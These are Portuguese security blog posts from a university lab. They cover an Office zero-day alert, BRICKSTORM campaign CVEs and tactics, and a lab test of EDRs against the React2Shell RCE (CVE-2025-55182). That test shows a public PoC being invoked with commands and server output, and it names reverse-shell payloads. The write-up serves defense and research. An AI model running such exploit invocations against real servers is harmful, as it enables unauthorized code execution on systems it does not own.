Esse é um alerta crítico. A Microsoft lançou no início da noite de ontem (26 de janeiro de 2026) uma atualização de segurança de emergência, para corrigir a vulnerabilidade zero-day CVE-2026-21509, que permite contornar de proteções contra controles inseguros nos aplicativos Microsoft Office, fazendo que um ataque possa acontecer por intermédio de um documento ou arquivo malicioso, possivelmente sem interação do usuário.
A vulnerabilidade atinge aplicações Microsoft Office / 365 tanto no Windows como no macOS (veja comentário sobre o MacOS no final dessa postagem).
Temos notícias de que vulnerabilidade essa está sendo explorada ativamente por atacantes usando documentos maliciosos.
Essa falha afeta todas as versões, tais como Office 2016, 2019, LTSC 2021/2024 e Microsoft 365 Apps Enterprise, bem como Microsoft 365 Standalone ou Famility Edition, tanto no Windows quanto no macOS.
O que fazer, imediatamente
Aplique as atualizações de segurança do Microsoft Office via Microsoft Update ou WSUS.
Reinicie as aplicações Microsoft 365 (muito importante), ou faça um reboot.
Como mitigação temporária, configure o registro do Windows com a chave “Compatibility Flags” = 0x400 em HKEY_CURRENT_USER\Software\Microsoft\Office[version]\Common para reforçar as proteções OLE.
Monitore phishing com anexos Office, dado o uso em campanhas direcionadas.
Nota importante: reinicie a aplicação
Não há um “número de versão/build” específico a partir do qual se esteja seguro, pois a correção é aplicada via service-side change (mudança da regra de proteção COM/OLE nos servidores Microsoft). Assim, Office 2021 e posteriores, que estejam atualizados, ficam protegidos com a versão mais recente que você tenha testado como atualizada em 26/01/2026, e após reinício completo dos aplicativos, sem necessidade de novo patch de instalação ou alteração no número da versão local. Ou seja, se sua versão já estiver atualizada, pode ser que você não veja uma mudança no número de versão.
Severidade CVSS E EPSS
A pontuação CVSS de severidade dessa vulnerabilidade é 7.8 (alta severidade). No momento de escrita desse alerta (27/01/2026 9h43m BRT), ela ainda não possui um score EPSS (Exploit Prediction Scoring System) disponível nos dados públicos recentes, pois foi divulgada há apenas um dia (26 de janeiro de 2026). O EPSS é atualizado diariamente pela FIRST.org com base em dados de exploração real. Como ela está sendo explorada ativamente e listada no catálogo KEV da CISA, espera-se um score EPSS elevado. Verifique em https://www.first.org/epss/search?cve=CVE-2026-21509 para o valor mais atual.
Detalhamento
As proteções contra controles COM/OLE inseguros no Microsoft Office são mecanismos de segurança implementados para bloquear a execução automática de objetos “COM” (Component Object Model) e “OLE” (Object Linking and Embedding) potencialmente maliciosos.
Objetos COM/OLE perigosos são componentes ActiveX ou objetos vinculados, embutidos, anexados ou inseridos em documentos do Microsoft Office (como ícones, gráficos ou mini-aplicativos de outros programas) que podem conter código malicioso.
Eles podem explorar a confiança automática do Office para executar scripts ou payloads sem interação segura do usuário, permitindo roubo de dados, instalação de malware ou controle remoto do sistema, como observado em ataques por meio de macros VBA, arquivos HTA ou streams OLE ofuscados em documentos Word ou Excel.
A Microsoft introduziu mecanismos de mitigação, incluindo kill bits, para reduzir esses riscos, especialmente em cenários de phishing com anexos maliciosos. Em segurança cibernética, chamamos essas proteções de “kill bits“. Esses kill bits são flags de segurança no Registro do Windows que desabilitam a criação ou execução de controles ActiveX específicos no Microsoft Office. A vulnerabilidade zero-day CVE-2026-21509 no Microsoft Office explora uma falha relacionada a essa proteção, permitindo contornar a restrição imposta pelos kill bits.
Apple / macOS
A CVE-2026-21509 afeta sim o Microsoft 365 no macOS, especificamente as Microsoft 365 Apps for Enterprise, Family e Standalone (incluindo Word, Excel, PowerPoint, Outlook), pois as mitigações OLE/COM são aplicadas no cliente Office, não dependentes do Sistema Operacional.
A Microsoft confirma que para Office 2021 e posteriores (incluindo M365), a proteção é via service-side change, requerendo reinício dos apps no macOS após propagação do serviço, similar ao Windows. Verifique atualizações no Microsoft AutoUpdate no macOS e reinicie os apps para ativar a correção emergencial de 26/01/2026.
Apesar da correção ter saído ontem, 26/1/2026, no caso do macOS a versão NÃO vulnerável é a partir de, e incluindo, a Version 16.105.1, de 20/01/2026. Em outras palavras, a instalação em si não muda de número de versão via patch tradicional; o ambiente passa a ficar protegido quando o tenant já recebeu a atualização no serviço e o usuário reinicia Word/Excel/PowerPoint/Outlook, momento em que as novas mitigações OLE/COM entram em vigor.
Caso queira verificar e forçar uma atualização no macOS, os comandos via terminal são os seguintes:
cd "/Library/Application Support/Microsoft/MAU2.0/Microsoft AutoUpdate.app/Contents/MacOS"
./msupdate --list # Lista atualizações disponíveis
./msupdate --install # Instala todas
Adriano Mauro Cansian, Doutor em Física Computacional e Professor Associado e pesquisador da UNESP – Universidade Estadual Paulista, possui 30 anos de experiência em pesquisa, desenvolvimento e ensino de segurança cibernética. Fundador e coordenador do Laboratório ACME! Cybersecurity Research, e revisor das revistas “Computers & Security” e “International Journal of Forensic Computer Science“, consultor e membro de vários comitês e organizações técnicas para promover a pesquisa em segurança da informação, além de atuar como voluntário em organizações de governança da Internet.
Complementando as informações sobre a campanha BRICKSTORM, sobre a qual falamos em postagem anterior.
Atribuída ao grupo UNC5221 (atores patrocinados pela China), BRICKSTORM está associada a múltiplas vulnerabilidades críticas em dispositivos de perímetro e em infraestruturas de acesso remoto. Embora BRICKSTORM em si não seja uma vulnerabilidade específica (ela é um malware do tipo “backdoor“), os atores exploram várias CVEs para obter acesso inicial aos ambientes das vítimas.
A seguir listamos todas as CVEs que apuramos estarem associadas a essa campanha. Nossa recomendação é que o leitor faça a gestão de vulnerabilidades e corrija ou mitigue essas vulnerabilidades, para evitar ser vítima dessa campanha.
Observação: os valores de EPSS foram levantados em 26/12/2025.
EPSS (CVE-2025-0282): 94.11% – Probabilidade muito alta de exploração nos próximos 30 dias.
EPSS (CVE-2025-0283): 22.99% – Probabilidade moderada de exploração nos próximos 30 dias.
Descrição: CVE-2025-0282 é um buffer overflow baseado em stack não autenticado que permite execução remota de código (RCE). Exploração bem-sucedida resulta em acesso não autenticado ao appliance VPN, levando a comprometimento potencial de toda a rede downstream.
Exploração por UNC5221: Zero-day exploitation começou em meados de dezembro de 2024. Após exploração, UNC5221 implanta múltiplas famílias de malware customizado incluindo ZIPLINE, THINSPOOL, LIGHTWIRE e WARPWIRE.
Técnicas Pós-Exploração:
Desabilitar SELinux;
Bloquear syslog forwarding via iptables;
Remontar drive como read-write;
Implantar web shells em getComponent.cgi e restAuth.cgi;
Usar PHASEJAM dropper para modificações persistentes;
Simular atualizações do sistema para evitar detecção.
Versões Afetadas: 22.7R2.5 e anteriores, 9.x (end of life).
Data de Divulgação: 3 de abril de 2025.
Severidade: Crítica.
EPSS: 49.13% – Probabilidade moderada-alta de exploração nos próximos 30 dias
Descrição:Buffer overflow que permite execução remota de código. Exploração bem-sucedida resulta em RCE no appliance VPN.
Exploração por UNC5221: Exploração ativa observada desde março de 2025. Após exploração inicial, UNC5221 implanta BRICKSTORM e outras ferramentas de backdoor para manter acesso persistente.
EPSS: 94.37% – Probabilidade muito alta de exploração nos próximos 30 dias.
Descrição: Bypass de autenticação que permite acesso não autorizado ao appliance.
Exploração por UNC5221: Explorado desde dezembro de 2023 como parte de campanha de longa duração. Combinado com CVE-2024-21887 para obter acesso inicial.
Tipo: Divulgação de Informação Sensível / Buffer Overflow.
Plataforma:Citrix NetScaler ADC e NetScaler Gateway appliances.
Severidade: Crítica.
EPSS: 94.35% – Probabilidade muito alta de exploração nos próximos 30 dias.
Exploração por UNC5221: Zero-day exploitation documentado. Parte do histórico de UNC5221 de exploração de zero-days em dispositivos edge.
Relação com BRICKSTORM
Como já mencionado, BRICKSTORM não é uma vulnerabilidade específica, mas sim um malware backdoor implantado após exploração bem-sucedida de uma das CVEs acima. O fluxo típico de ataque é:
Acesso Inicial: Exploração de CVE em dispositivo edge (Ivanti, NetScaler, etc.).
Implantação de Malware: Após RCE, UNC5221 implanta BRICKSTORM ou outras ferramentas de backdoor.
Persistência: BRICKSTORM estabelece comunicação C2 criptografada e permite movimento lateral.
Movimento Lateral: BRICKSTORM facilita acesso a VMware vCenter, controladores de domínio e outros sistemas críticos.
Ecosistema de Malware Associado
UNC5221 utiliza um ecosistema de malware sofisticado chamado SPAWN, que inclui:
SPAWNANT:Installer/loader.
SPAWNMOLE:Tunneler para movimento lateral.
SPAWNSNAIL:SSH backdoor.
SPAWNCHIMERA: Variante adicional
ZIPLINE:Passive backdoor.
THINSPOOL:Dropper.
LIGHTWIRE:Web shell.
WARPWIRE:Credential harvester.
PHASEJAM:Dropper específico para Ivanti.
BRICKSTORM:Backdoor para VMware e Windows.
Padrão Operacional de UNC5221
Foco em Edge Devices: Preferência consistente por exploração de vulnerabilidades em appliances de perímetro (VPN, load balancers, etc.).
Zero-Day Exploitation: Histórico de acesso e exploração de vulnerabilidades zero-day.
Desenvolvimento Ativo: Contínuo desenvolvimento e modificação de malware.
Ofuscação de Origem: Uso de redes de appliances comprometidos (Cyberoam, QNAP, ASUS routers) para mascarar origem real.
Movimento Lateral Sofisticado: Após acesso inicial, movimento lateral para infraestrutura crítica com mínima telemetria
Persistência de Longo Prazo: Tempo médio de permanência não detectada de 393 dias.
O Tempo médio de permanência não detectada do BRICKSTORM é de 393 dias
Recomendações
Manter patches atualizados em todos appliances edge.
Implementar monitoramento especializado em dispositivos VPN e load balancers.
Usar MFA em todos acessos administrativos.
Implementar segmentação de rede adequada.
Monitorar atividades de reconhecimento (requisições sequenciais de versão).
Realizar busca ativa (hunt) por artefatos de BRICKSTORM em VMware vCenter.
Referências
Google Threat Intelligence Group. “Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation.” 8/12/2025
Google Threat Intelligence Group. “Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457).” 3/04/2025
Mandiant Services. “Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors.” 24/09/2025
Adriano Mauro Cansian, Doutor em Física Computacional e Professor Associado e pesquisador da UNESP – Universidade Estadual Paulista, possui 30 anos de experiência em pesquisa, desenvolvimento e ensino de segurança cibernética. Fundador e coordenador do Laboratório ACME! Cybersecurity Research, e revisor das revistas “Computers & Security” e “International Journal of Forensic Computer Science“, consultor e membro de vários comitês e organizações técnicas para promover a pesquisa em segurança da informação, além de atuar como voluntário em organizações de governança da Internet.
Em 4 de dezembro de 2025, a Cybersecurity and Infrastructure Security Agency (CISA), a National Security Agency (NSA) e o Canadian Centre for Cyber Security publicaram um comunicado conjunto alertando sobre uma nova e altamente sofisticada campanha de malware denominada BRICKSTORM.
Mais do que um backdoor convencional, o BRICKSTORM representa uma ameaça sistêmica a ambientes de virtualização, infraestrutura de identidade e operações corporativas críticas, explorando exatamente os pontos onde a visibilidade de segurança costuma ser limitada ou inexistente.
O relatório técnico AR25-338A, atualizado em 19 de dezembro de 2025, descreve em detalhes as capacidades avançadas do malware e disponibiliza indicadores de comprometimento destinados a apoiar equipes de defesa. Investigações conduzidas em resposta a incidentes revelam um dado alarmante, o tempo médio de permanência não detectada nos ambientes comprometidos chega a 393 dias, evidenciando o nível de evasão operacional alcançado pelos atores responsáveis.
A campanha é atribuída a atores patrocinados pelo Estado da República Popular da China, com foco em acesso persistente, coleta de credenciais privilegiadas e exploração silenciosa de infraestruturas críticas.
1. Visão Geral Técnica
O BRICKSTORM é um backdoor modular desenvolvido para ambientes VMware vSphere, incluindo vCenter e ESXi, além de sistemas Windows. Até o momento, foram identificadas pelo menos oito amostras distintas, coletadas a partir de ambientes reais de vítimas, incluindo organizações atendidas diretamente pela CISA em operações de resposta a incidentes.
O malware foi desenvolvido em linguagem Go, uma escolha arquitetural estratégica que permite portabilidade entre plataformas Linux, BSD e Windows. Esse fator é especialmente relevante porque possibilita a implantação do BRICKSTORM em appliances de perímetro e componentes de infraestrutura que normalmente não contam com EDRs ou agentes de segurança tradicionais, reduzindo drasticamente a superfície de detecção.
1.1. Vetores de Infecção e Acesso Inicial
A análise de múltiplos incidentes revela um padrão recorrente nos vetores de ataque utilizados. O acesso inicial ocorre, predominantemente, por meio da exploração de vulnerabilidades em dispositivos de perímetro e sistemas de acesso remoto , incluindo appliances de rede expostos à Internet (veja esss outra postagem sobre as vulnerabilidades associadas ao ataque inicial).
Em pelo menos um dos casos documentados, os atores exploraram vulnerabilidades zero-day, indicando acesso a capacidades avançadas de desenvolvimento e manutenção de exploits.
Após o comprometimento inicial, geralmente por meio de web shells implantadas em servidores na DMZ, os atores realizam movimento lateral utilizando protocolos amplamente disponíveis como RDP e SMB. Durante esse processo, credenciais são sistematicamente coletadas e reutilizadas para acessar sistemas críticos, incluindo controladores de domínio e servidores ADFS.
Em um incidente investigado pela CISA, os atacantes mantiveram acesso persistente desde abril de 2024. A partir de uma web shell em um servidor web da DMZ, o grupo avançou lateralmente até o vCenter, onde implantou o BRICKSTORM como mecanismo de persistência de longo prazo.
Esse padrão reforça um ponto crítico, a campanha não depende de exploração ruidosa, mas sim de progressão metódica e silenciosa dentro da rede.
1.2. Persistência e Mecanismos de Autoproteção
O BRICKSTORM implementa mecanismos robustos de persistência, projetados para resistir a tentativas de remoção parcial ou reinicializações do sistema. Um dos componentes mais relevantes é sua função de auto-vigilância, que monitora continuamente o próprio processo e o reinicia automaticamente caso seja interrompido.
Em sistemas Linux e Unix, o malware é implantado em diretórios sensíveis, como /etc/sysconfig/, e integrado aos scripts de inicialização do sistema. Em ambientes VMware, modificações são realizadas diretamente nos arquivos de inicialização do hypervisor, garantindo carregamento precoce durante o boot.
As amostras analisadas indicam desenvolvimento ativo, com uso de obfuscação por ferramentas como Garble e versões customizadas de bibliotecas. Algumas variantes incluem timers programados para atrasar a comunicação com o C2, aguardando datas específicas, um indicativo claro de planejamento operacional e tentativa de evitar correlação temporal com o incidente inicial.
2. Capacidades Técnicas Avançadas
2.1. Comunicação de Comando e Controle
O canal de comando e controle do BRICKSTORM foi projetado para dificultar ao máximo a inspeção e correlação por SOCs tradicionais. O malware combina múltiplas camadas de comunicação e criptografia:
HTTPS como camada de transporte básica.
WebSockets para multiplexação de sessões.
TLS aninhado na camada de aplicação.
DNS-over-HTTPS (DoH) para ocultar resolução de nomes.
Na prática, essa combinação quebra modelos clássicos de detecção baseados em DNS, proxy e inspeção de tráfego, especialmente em ambientes onde appliances de perímetro são tratados como “caixas pretas” do ponto de vista de segurança.
A infraestrutura de C2 observada inclui uso de Cloudflare Workers, aplicações Heroku e serviços de DNS dinâmico como sslip.io e nip.io. Um aspecto particularmente relevante é a ausência de reutilização de domínios C2 entre vítimas, indicando operações altamente compartimentalizadas e orientadas à evasão.
2.2. Funcionalidades de Controle Remoto
Uma vez estabelecida a comunicação, o BRICKSTORM oferece aos operadores um conjunto completo de capacidades de controle remoto:
Shell interativo para execução de comandos arbitrários.
Gerenciamento completo de arquivos.
Proxy SOCKS para facilitação de movimento lateral.
API HTTP para operações administrativas.
Suporte a VSOCK, permitindo comunicação inter-VM em ambientes virtualizados.
Essas funcionalidades transformam o sistema comprometido em um ponto de apoio operacional, capaz de sustentar operações de espionagem de longo prazo.
3.3. Escalação de Privilégios em Ambientes vCenter
Um dos aspectos mais sofisticados da campanha é a implantação de um Servlet Filter malicioso, rastreado como BRICKSTEAL, no Apache Tomcat que hospeda a interface web do vCenter.
Esse componente intercepta requisições HTTP relacionadas à autenticação SAML2, decodificando headers que podem conter credenciais em texto claro. Considerando que muitas organizações integram o vCenter ao Active Directory, o impacto potencial é elevado.
Com credenciais administrativas em mãos, os atores exploram recursos legítimos do vCenter para clonar máquinas virtuais críticas, como controladores de domínio. Essas clones permitem a extração offline de artefatos sensíveis, incluindo o banco ntds.dit, sem disparar alertas nos sistemas originais.
Esse método ilustra um ponto essencial, a virtualização deixa de ser apenas alvo e passa a ser ferramenta do ataque.
3. Indicadores de Comprometimento e Detecção
A CISA disponibilizou um conjunto abrangente de indicadores técnicos, incluindo nomes de arquivos, diretórios, variáveis de ambiente, padrões de tráfego e modificações em sistemas.
Apesar da utilidade desses IoCs, o próprio perfil da campanha indica que a detecção eficaz depende muito mais de hunting ativo, análise comportamental e baseline de ambientes virtualizados do que de simples correspondência por assinatura.
Regras YARA e Sigma, hashes conhecidos e análise forense de logs devem ser tratados como ponto de partida, não como solução definitiva.
4. Contexto de Ameaça e Atores
A atividade foi atribuída ao grupo UNC5221, associado a operações patrocinadas pela China, conforme documentado pelo Google Threat Intelligence Group e pela Mandiant.
Os setores-alvo incluem governo, TI, serviços jurídicos, SaaS e BPOs, organizações que frequentemente operam como nós intermediários de acesso a dados, identidades e infraestrutura crítica.
O longo tempo de permanência e a baixa geração de telemetria indicam que os operadores monitoram ativamente os ambientes comprometidos e adaptam suas técnicas diante de sinais de investigação, reforçando o caráter persistente da ameaça.
5. Recomendações de Mitigação
As recomendações das agências incluem:
Hunting ativo em vCenter, ESXi e appliances de perímetro
Implementação rigorosa de MFA para acessos administrativos
Segmentação entre DMZ e infraestrutura crítica
Revisão contínua de logs de autenticação e alterações em ambientes virtualizados
Aplicação tempestiva de patches de segurança em plataformas VMware
Organizações que identifiquem indícios de comprometimento devem acionar a CISA e considerar engajamento imediato de equipes especializadas em resposta a incidentes.
6. Conclusão
O BRICKSTORM não é apenas mais um backdoor sofisticado. Ele representa uma mudança clara na forma como atores patrocinados por Estados exploram virtualização, identidade e confiança operacional.
Ao operar quase invisivelmente em camadas tradicionalmente pouco monitoradas, essa campanha desafia modelos clássicos de defesa e reforça a necessidade de visibilidade real sobre infraestrutura, não apenas sobre endpoints.
Para SOCs, MSPs e organizações que operam ambientes híbridos e virtualizados, a lição é inequívoca, virtualização deixou de ser apenas plataforma, passou a ser superfície de ataque crítica.
Adriano Mauro Cansian, Doutor em Física Computacional e Professor Associado e pesquisador da UNESP – Universidade Estadual Paulista, possui 30 anos de experiência em pesquisa, desenvolvimento e ensino de segurança cibernética. Fundador e coordenador do Laboratório ACME! Cybersecurity Research, e revisor das revistas “Computers & Security” e “International Journal of Forensic Computer Science“, consultor e membro de vários comitês e organizações técnicas para promover a pesquisa em segurança da informação, além de atuar como voluntário em organizações de governança da Internet.
Artur Spadoni | artur.spadoni@acmesecurity.org | 12/12/2025
1. Introdução
Como já discutido em uma postagem anterior aqui no “O Diário” O React é uma biblioteca gratuita e open-source para JavaScript, amplamente utilizada na construção de interfaces web modernas. Embora originalmente projetado para execução no lado do cliente, suas versões mais recentes passaram a integrar mecanismos de renderização no servidor por meio dos React Server Components, suportados pelo React Flight Protocol. Essa adoção massiva faz com que vulnerabilidades em seu ecossistema, especialmente nas camadas server-side introduzidas recentemente, possam ter impactos significativos. É o caso da vulnerabilidade apelidada “React2Shell”, catalogada como CVE-2025-55182 pela National Vulnerability Database (NVD) em 3 de dezembro de 2025.
Este relatório tem como objetivo apresentar e demonstrar uma Prova de Conceito (PoC) pública relacionada à CVE-2025-55182, como esta pode ser explorada e o porquê de ser alarmante e crítica.
Além disso, investigamos e descobrimos que, de 4 EDRs padrões de mercado testados, 3 deles não conseguiram detectar ou bloquear o ataque.
Serão descritos:
Aspectos técnicos da vulnerabilidade;
Um método de exploração em ambiente controlado; e
Como plataformas de monitoramento são essenciais para a mitigação de ataques cibernéticos.
2. Visão Geral
A CVE-2025-55182 é uma vulnerabilidade de execução remota de código (RCE) que afeta aplicações que utilizam React Server Components por meio do React Flight Protocol, incluindo frameworks como o Next.js até a versão 16.0.6. A falha permite que um atacante execute comandos arbitrários no servidor enviando payloads maliciosos em requisições POST. A exploração ocorre devido à forma inadequada como o servidor desserializa estruturas recebidas pelo RFP: as funções responsáveis pela reconstrução dos modelos, em especial reviveModel(), não validam corretamente objetos contendo o campo __proto__ e cadeias de métodos then. Isso possibilita a introdução de um pseudo-objeto capaz de manipular o protótipo e acessar o construtor global Function, utilizado para executar comandos do sistema operacional sem autenticação ou privilégios adicionais.
2.1. Detalhes Técnicos
De acordo com indicadores oficiais, os seguintes detalhes foram levantados:
Categoria
Detalhes
Severidade
CVSS 3.x: 10.0 (Critica)
Data de publicação
3 de dezembro de 2025
Complexidade de exploração
Baixa – Requer requisição POST para um servidor vulnerável
Produto afetado
React 19, Next.js 15.0.0 a 16.0.6
Fraqueza Associada
CWE-502 – Desserialização de informação não confiável
Pontuação EPSS
1`3.40 % (em 08/12/2025) 77.80% (em 10/12/2025) 76.01% (em 11/12/2025)
Patch de correção
Pacote NPM (lançado 5 de dezembro de 2025, 06h29 UTC)
Setores Alvos
E-commerce, SaaS, Fintech, Plataformas de Streaming
2.2. Principal Vetor
O principal vetor de exploração da CVE-2025-55182 consiste no envio de requisições POST contendo payloads maliciosos que se passam por objetos válidos do React Flight Protocol. Esses payloads utilizam pseudo-objetos, incluindo estruturas manipuladas com campos como __proto__ e cadeias then, que exploram a desserialização insegura realizada pelo servidor. Ao aceitar e processar esses objetos sem validação adequada, o RFP permite que o atacante desencadeie execução arbitrária de código no ambiente server-side.
2.3. Grupos de Criminosos
Segundo a equipe de threat intelligence da Amazon, diversos atores de ameaça classificados como China-nexus, incluindo Earth Lamia e Jackpot Panda, iniciaram a exploração da CVE-2025-55182 poucas horas após sua divulgação em 3 de dezembro de 2025. Em análises de casos semelhantes envolvendo vulnerabilidades de desserialização e execução remota de código. A Unit 42 observou que esses grupos tendem a desenvolver rapidamente variantes próprias dos exploits, ajustando payloads e técnicas de obfuscar para aumentar a taxa de sucesso e reduzir a detecção. Esse padrão, já documentado pela Unit 42 em outras campanhas com perfis similares, reforça a probabilidade de múltiplos atores terem adaptado rapidamente a PoC pública para explorar React2Shell de diferentes maneiras.
3. Explorando a CVE-2025-55182
Foram utilizados 5 ambientes de laboratório, a fim de simular ambientes vulneráveis e um atacante para testar o comportamento da CVE-2025-55182 e avaliar a competência de diferentes monitoradores de dispositivos (EDRs – Endpoint Detection and Response).
Os ambientes propositalmente vulneráveis foram configurados com sistema operacional Windows 11 e utilizando a versão vulnerável Next.js 16.0.0 para o web-server, totalizando 4 ambientes com soluções de EDR distintas (os nomes dos EDRs não serão divulgados). Para simular o atacante utilizou-se o Kali Linux sem modificações.
IMPORTANTE: Note que nosso foco foi pesquisar EDRs, portanto, propositalmente, não foram utilizadas outras camadas de proteção, tais como WAF ou firewall local. Note também que o ataque não seria possível caso o Next.js já tivesse sido atualizado, ou seja, a aplicação de path é uma das camadas de segurança capaz de deter esse ataque.
Os testes e ensaios foram realizados entre os dias 8 a 12/12/2025 no laboratório ACME! Cybersecutiry Research, na UNESP de São José do Rio Preto. Todos os experimentos foram repetidos 3 vezes para verificação de erros.
3.1. Construção do Exploit e Criação do Payload
A exploração foi realizada utilizando a PoC disponibilizada publicamente no GitHub em 4 de dezembro de 2025 pelo engenheiro de software Moritz Sanft (“msanft”). A PoC é composta por um script em Python responsável por construir o payload malicioso e enviá-lo a um servidor vulnerável. O repositório também inclui a pasta test-server, contendo um ambiente mínimo baseado em Next.js com React Server Components, utilizado para demonstrar a vulnerabilidade em funcionamento
De forma resumida, as etapas adotadas no laboratório foram as seguintes:
Instalar o Node.js e Next.js, nas versões vulneráveis nos ambientes alvo, garantindo que o projeto com RSC esteja devidamente configurado.
Acessar a pasta test-server ou o diretório correspondente pelo terminal, e executar o comando ‘npm run dev’ para iniciar o servidor.
No ambiente ofensivo (Kali Linux), executar o script ‘poc.py’ fornecido na PoC, informando argumentos necessários, simulando a execução remota.
PS C:\Users\[username]\Desktop\CVE2025-55182\test-server> npm install next
up to date, audited 357 packages in 3s
141 packages are looking for funding
run `npm fund` for details
1 critical severity vulnerability
Figura 1 – Node.js indicando vulnerabilidade crítica; note que a versão utilizada está, de fato, exposta.
3.2. Execução da PoC
O script da PoC (poc.py) aceita dois argumentos chaves, endereço IPv4+Porta (por exemplo, “127.0.0.0:80”) seguido pelo comando shell desejado ou payload (“whoami” ou até um reverse shell). Durante a execução no ambiente Kali Linux, o script constrói o ‘chunk’ serializado do Flight Protocol abusando da falha de desserialização, anexando a poluição do proto e o objeto “then-ável” que dispara durante a resolução do servidor nos ambientes.
┌─(kali@kali)-[~]└─$ python3 PoC_react/poc.py "http://172.31.222.25:3000" "echo pwnd by sylvester"500:N176530853660.8210:{"a":"$@1","f":"","b":"development"}1:D["time":0.649100000002363Z]1:E["digest":"pwnd by sylvester","name":"Error","message":"NEXT_REDIRECT","stack":[],"env":"Server","owner":null]┌─(kali@kali)-[~]└─$ python3 PoC_react/poc.py "http://172.31.222.25:3000" "dir"500:N176530855033Z.1970:{"a":"$@1","f":"","b":"development"}1:D["time":0.465700000006519]1:E["digest":"Volume in drive C has no label.\r\n Volume Serial Number is E86C-A9DF\r\n\r\n Directory of C:\Users\fantomas\Drive\PoC-2025-5-3-mail-main\test-server\n\n 12/09/2025 04:23 PM <DIR> . 12/09/2025 04:23 PM -0 .gitignore\r\n12/09/2025 04:28 PM 480 .gitignore\r\n12/09/2025 04:23 PM <DIR> next\r\n12/09/2025 04:23 PM 465 eslint.config.mjs\r\n12/09/2025 04:28 PM 257 next-env.d.ts\r\n12/09/2025 04:23 PM 1 33 next.config.ts\r\n12/09/2025 04:28 PM <DIR> node_modules\r\n12/09/2025 04:28 PM 227,243 package-lock.json\r\n12/09/2025 04:23 PM 567 package.json\r\n12/09/2025 04:23 PM <DIR> public\r\n12/09/2025 04:23 PM 1,450 README.md\r\n12/09/2025 04:23 PM 338,468 bytes\r\n12/09/2025 04:23 PM 0 File(s) 107,770,0 97,664 bytes free","name":"Error","message":"NEXT_REDIRECT","stack":[],"env":"Server","owner":null]
Figura 2 – Disparo da PoC pelo atacante
Invalid source map. Only conformant source maps can be used to find the original code. Cause: Error: sourceMapURL could not be parsed✖ Error: NEXT_REDIRECT at ignore-listed frames { digest: 'Volume in drive C has no label.\r\n' +'Volume Serial Number is E86C-A9DF\r\n' +'\r\n' +'Directory of C:\\Users\\jubaluba\\lala\\CVE-2025-55182-main\\test-server\r\n' +'\r\n' +'12/09/2025 04:28 PM <DIR> .\r\n' +'12/09/2025 04:23 PM <DIR> ..\r\n' +'12/09/2025 04:23 PM 480 .gitignore\r\n' +'12/09/2025 04:28 PM <DIR> .next\r\n' +'12/09/2025 04:23 PM <DIR> app\r\n' +'12/09/2025 04:23 PM 107,113 bun.lock\r\n' +'12/09/2025 04:23 PM 465 eslint.config.mjs\r\n' +'12/09/2025 04:28 PM 257 next-env.d.ts\r\n' +'12/09/2025 04:23 PM 133 next.config.ts\r\n' +'12/09/2025 04:28 PM <DIR> node_modules\r\n' +'12/09/2025 04:28 PM 227,243 package-lock.json\r\n' +'12/09/2025 04:23 PM 567 package.json\r\n' +'12/09/2025 04:23 PM 94 postcss.config.mjs\r\n' +'12/09/2025 04:23 PM <DIR> public\r\n' +'12/09/2025 04:23 PM 1,450 README.md\r\n' +'12/09/2025 04:23 PM 666 tsconfig.json\r\n' +' 10 File(s) 338,468 bytes\r\n' +' 6 Dir(s) 107,770,097,664 bytes free'}POST / 500 in 43ms (compile: 4ms, render: 39ms)
Figura 3 – Execução remota no servidor
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 589, in request resp = self.send(prep, **send_kwargs)File "/usr/lib/python3/dist-packages/requests/sessions.py", line 703, in send r = adapter.send(request, **kwargs)File "/usr/lib/python3/dist-packages/requests/adapters.py", line 682, in send raise ConnectionError(err, request=request)requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))┌─(kali@kali)-[~]└─$ python3 PoC_react/poc.py "http://172.31.222.21:3000""dir" █
Figura 4 – Mensagem de erro no ambiente atacante após ser interceptado
3.4 Consideraçõe éticas e créditos
Todos os testes foram feitos em rede isolada de laboratório, com versões fora de produção (React 19.00 – 19.2.0), e divulgadas apenas após mitigação; pesquisadores devem creditar devidamente a PoC utilizada, neste caso a Moritz Sanft, e aderir divulgações similares.
O PoC de Sanft explora uma aplicação Next.js padrão (criada via create-next-app), enviando payloads em parâmetros como “0” e “1” para manipular chunks de resposta e executar comandos como “id > /tmp/pwned” via child_process.execSync. Diferente de PoCs iniciais não funcionais (como ejpir/CVE-2025-55182-poc), o código de Sanft foi amplamente adotado em scans reais, precedendo o PoC oficial de Lachlan Davidson.
O repositório oficial é https://github.com/msanft/CVE-2025-55182, contendo explicação detalhada e código completo de RCE para React Server Functions em Next.js. Foi lançado em 4 de dezembro de 2025.
4. Resultados e Observações
Nos testes realizados com os ambiente, observou-se o seguinte comportamento:
Dos 4 agentes de proteção (EDRs) testados, apenas um conseguiu detectar e impedir a atividade maliciosa em tempo real. O agente gerou alertas específicos:
O Monitorador de Rede bloqueou uma tentativa de ataque.
– A tentativa mal-intencionada Exploit.CommandInjection.299[…]
– A tentativa mal-intencionada Exploit.HTTP.CVE-2025-55182[…]
Os alertas identificaram o exploit, a CVE relacionada e o local sendo atacado, além de impedir o ataque. Para os outros 3 ambientes testados, o payload foi extraído sem qualquer alerta, demonstrando a criticidade e evidenciando a necessidade de reforçar os EDR’s com métodos de mitigação, adequados a esta vulnerabilidade, e outras camadas de segurança.
A tabela a seguir resume os resultados observados:
Ambiente
EDR/Antivírus
Execução do Ataque
Alertas?
Bloqueio?
1
EDR XPToA
Sucesso
Não
Não
2
EDR XPToB
Sucesso
Não
Não
3
EDR XPToC
Sucesso
Não
Não
4
EDR XPToD
Bloqueado
Sim
Sim
4.1. Sobre os ambientes que não perceberam qualquer atividade
Os resultados de execução imediata do comando confirmam a necessidade de apenas acessar a rede, dispensando autenticação ou elevação de privilégios, o que permite inferir que a exploração ocorre como um ponto cego nos sistemas que ainda não possuem assinaturas ou modelos de detecção ajustados para o protocolo Flight ou requisições POST em geral.
4.2 Sobre o ambiente que detectou e bloqueou o ataque
Os alertas foram precisos e mencionaram explicitamente a tentativa de injeção de comando, exploração vinculada ao CVE-2025-55182 e a identificação do endpoint alvo. Isso confirma a eficiência e necessidade de agentes monitoradores atualizados e competentes para a segurança de servidores abertos à Internet, uma vez que não é possível prever o surgimento de toda vulnerabilidade capaz de destruir o sistema alvo.
5. Conclusões
